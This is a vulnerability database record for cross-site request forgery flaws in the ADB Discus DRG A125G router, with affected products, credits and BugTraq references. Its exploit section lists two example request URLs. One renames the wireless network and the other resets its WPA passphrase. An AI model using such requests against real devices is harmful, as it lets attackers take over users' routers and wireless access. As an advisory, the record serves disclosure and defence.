ID
VAR-E-201311-0400
TITLE
ADB Discus DRG A125G Router Multiple Cross Site Request Forgery Vulnerabilities
Trust: 0.3
DESCRIPTION
ADB Discus DRG A125G is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions and compromise the affected device.
Trust: 0.3
AFFECTED PRODUCTS
vendor: | adb | model: | discus drg a125g | scope: | - | version: | - | Trust: 0.3 |
EXPLOIT
To exploit these issues, an attacker must entice a user into visiting a malicious site.
The following example exploits are available:
http://www.example.com/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof
http://www.example.com/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Input Validation Error
Trust: 0.3
CREDITS
Sebastián Magof
Trust: 0.3
EXTERNAL IDS
db: | BID | id: | 63907 | Trust: 0.3 |
REFERENCES
url: | http://www.pirellibroadband.com/ | Trust: 0.3 |
SOURCES
db: | BID | id: | 63907 |
LAST UPDATE DATE
2022-07-27T09:54:22.723000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 63907 | date: | 2013-11-24T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 63907 | date: | 2013-11-24T00:00:00 |